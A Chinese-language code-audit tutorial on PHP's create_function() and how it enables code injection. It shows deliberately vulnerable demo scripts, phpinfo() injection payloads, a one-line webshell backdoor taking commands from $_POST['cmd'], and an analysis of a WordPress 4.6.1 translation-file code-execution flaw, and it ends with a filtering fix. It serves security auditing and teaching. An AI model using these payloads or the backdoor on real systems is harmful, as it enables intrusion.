代码审计之create_function()函数

0x00 create_function()简介

适用范围：PHP 4> = 4.0.1，PHP 5，PHP 7

功能：根据传递的参数创建匿名函数，并为其返回唯一名称。

语法：

create_function(string $args,string $code)
string $args 声明的函数变量部分

string $code 执行的方法代码部分

0x01 环境搭建

本次测试在Windows下用PHPstudy搭建环境，使用的是:PHP 5.4.45 + MySQL 5.5 + Apache

0x02 函数功能分析

官方案例：

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc
";
echo $newfunc(2, M_E) . "
";
?>

保存为func.php，访问如下：

分析：

create_function()会创建一个匿名函数（lambda样式）。此处创建了一个叫lambda_1的函数，在第一个echo中显示出名字，并在第二个echo语句中执行了此函数。

create_function()函数会在内部执行 eval()，我们发现是执行了后面的return语句，属于create_function()中的第二个参数string $code位置。

因此，上述匿名函数的创建与执行过程等价于：

<?php
function lambda_1($a,$b){
    return "ln($a) + ln($b) = " . log($a * $b);
}
?>

create_function()函数在代码审计中，主要用来查找项目中的代码注入和回调后门的情况，熟悉了执行流程，我们可以熟练的实现对代码注入的payload构造，从而进行漏洞挖掘和找出存在的缺陷。

0x03 实现代码注入的案例

案例 1

1.php

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>

payload的构造：

http://localhost/test/1.php?sort_by='"]);}phpinfo();/*

还原实际的组合过程：

$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*

匿名函数实际的执行：

function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*
}

回车换行整理一下：

function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/*
}

案例 2

2.php

<?php
$c=$_GET['c'];
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");
$array=array('reall long string here,boy','this','midding lenth','larget');
usort($array,$lambda);
print_r($array);
?>

payload的构造：

http://localhost/test/2.php?c=1));}phpinfo();/*

还原实际的组合过程：

$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));");

匿名函数实际的执行：

 function ft($a,$b){
    return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));
 }

回车换行整理一下：

 function ft($a,$b){
    return (strlen($a)-strlen($b)+" . "strlen(1));
    }
    phpinfo();
    /*));
 }

0x04 实现后门的打造

houmen.php

<?php $func =create_function('',$_POST['cmd']);$func();?>

create_function()是可以利用当后门的函数，实际上它是通过执行eval实现(此处相当于一句话木马)，访问如下：

0x05 代码审计实战中的案例

WordPress <= 4.6.1 使用语言文件任意代码执行漏洞

接下来我们看这个版本的WordPress中，一处用到create_function的地方，在wp-includes/pomo/translations.php第203-209行：

/**
 * Makes a function, which will return the right translation index, according to the
 * plural forms header
 * @param int    $nplurals
 * @param string $expression
 */
function make_plural_form_function($nplurals, $expression) {
    $expression = str_replace('n', '$n', $expression);
    $func_body = "
        $index = (int)($expression);
        return ($index < $nplurals)? $index : $nplurals - 1;";
    return create_function('$n', $func_body);
}

我们看一下正常的字体文件zh_CN.mo，其中有这么一段：

Plural-Froms这个header就是上面的函数所需要处理的，其中nplurals的值即为$nplurals的值，而plural的值正是我们需要的$expression的值。所以我们将字体文件进行如下改动:

我们payload中的)首先闭合了前面的(，然后;结束前面的语句，接着是我们的一句话木马，然后用/*将后面不必要的部分注释掉，通过这样，我们就将payload完整的传入了create_function，在其创建函数时我们的payload就会被执行，由于访问每个文件时都要用这个对字体文件解析的结果对文件进行翻译，所以我们访问任何文件都可以触发这个payload：

修复方案:

在官方发布补丁前建议管理员增强安全意识，不要使用来路不明的字体文件、插件、主题等等。

对于开发者来说，建议对$expression中的特殊符号进行过滤，例如：

$not_allowed = array(";", ")", "}");
$experssion = str_replace($not_allowed, "", $expression);

0x06 create_function()被高版本 PHP 废弃

从PHP 7.2.0开始，create_function()被废弃